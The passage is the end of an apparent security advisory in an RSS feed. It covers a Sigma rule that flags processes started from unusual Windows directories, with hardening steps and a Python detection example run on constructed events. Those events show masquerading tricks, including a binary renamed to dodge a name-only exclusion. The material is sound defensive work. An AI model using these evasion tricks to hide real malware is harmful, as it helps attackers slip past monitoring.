<li>Investigate any alerts generated by the Sigma rule to determine if the process execution is legitimate or malicious.</li>
<li>Enable process creation logging (Security Event ID 4688 with command-line auditing, or Sysmon Event ID 1) so the Sigma rule has the image path and command line it needs to function effectively.</li>
<li>Review and harden permissions on the listed suspicious directories to prevent unauthorized file creation and execution.</li>
<li>Block execution of unsigned or untrusted executables from these directories using application control solutions.</li>
</ul>
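<p>The path-matching logic of the rule, as an added Python example that is not the Sigma rule itself: a process-creation event is flagged when its image sits in or below one of the listed directories, after the path is normalized so forward slashes, mixed case and <code>..</code> segments cannot dodge the prefix check, and a name-based exclusion list mirrors the one the rule description mentions. The 4688-style events, user names and file names are constructed.</p>

```python
import ntpath

# Directories named in the rule description: executables are not expected here.
SUSPICIOUS_DIRS = [r"C:\PerfLogs", r"C:\Users\Public", r"C:\Windows\Tasks", r"C:\Windows\AppReadiness"]

# Name-based exclusions as the rule describes them (see the note below on their weakness).
EXCLUDED_IMAGES = {"speechuxwiz.exe", "systemsettings.exe", "trustedinstaller.exe"}


def normalize(path):
    """Canonical, lower-cased Windows path: folds '/' to backslash and resolves '..' segments."""
    return ntpath.normpath(path).lower()


def in_suspicious_dir(image_path):
    r"""True if the image sits in, or below, one of the listed directories.

    The prefix must end at a separator so C:\Users\PublicData\app.exe is not
    matched by C:\Users\Public.
    """
    p = normalize(image_path)
    return any(p.startswith(normalize(d) + "\\") for d in SUSPICIOUS_DIRS)


def detect(events):
    """(image, user, command line) for process starts from the listed directories."""
    hits = []
    for ev in events:
        image = ev.get("NewProcessName", "")
        if not in_suspicious_dir(image):
            continue
        if ntpath.basename(normalize(image)) in EXCLUDED_IMAGES:
            continue
        hits.append((image, ev.get("SubjectUserName", ""), ev.get("CommandLine", "")))
    return hits


# Constructed Security 4688-style records (fields as named in the event XML).
EVENTS = [
    # svchost.exe masquerade in a public directory: flagged.
    {"NewProcessName": r"C:\Users\Public\svchost.exe", "SubjectUserName": "jdoe",
     "CommandLine": "svchost.exe -k netsvcs", "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    # The real svchost.exe: not in a listed directory.
    {"NewProcessName": r"C:\Windows\System32\svchost.exe", "SubjectUserName": "SYSTEM",
     "CommandLine": "svchost.exe -k netsvcs", "ParentProcessName": r"C:\Windows\System32\services.exe"},
    # Shares the prefix characters of C:\Users\Public but is a different directory.
    {"NewProcessName": r"C:\Users\PublicData\app.exe", "SubjectUserName": "jdoe",
     "CommandLine": "app.exe", "ParentProcessName": r"C:\Windows\explorer.exe"},
    # Forward slashes, lower case and a '..' hop: still C:\Windows\Tasks after normalization.
    {"NewProcessName": "c:/windows/tasks/../tasks/Updater.EXE", "SubjectUserName": "jdoe",
     "CommandLine": "Updater.EXE /silent",
     "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Binary renamed to an excluded name: slips past the name-only exclusion.
    {"NewProcessName": r"C:\Windows\AppReadiness\TrustedInstaller.exe", "SubjectUserName": "jdoe",
     "CommandLine": "TrustedInstaller.exe", "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print("suspicious start:", hit)
```

<p>The last constructed event shows the cost of excluding by file name alone: a binary dropped into <code>C:\Windows\AppReadiness</code> and named <code>TrustedInstaller.exe</code> is silently excluded. Where the log supplies it, exclude on the full expected path (the real TrustedInstaller lives in <code>C:\Windows\servicing</code>) or on the signer, never on the name alone.</p>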
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>defense-evasion</category><category>windows</category><category>masquerading</category></item></channel></rss>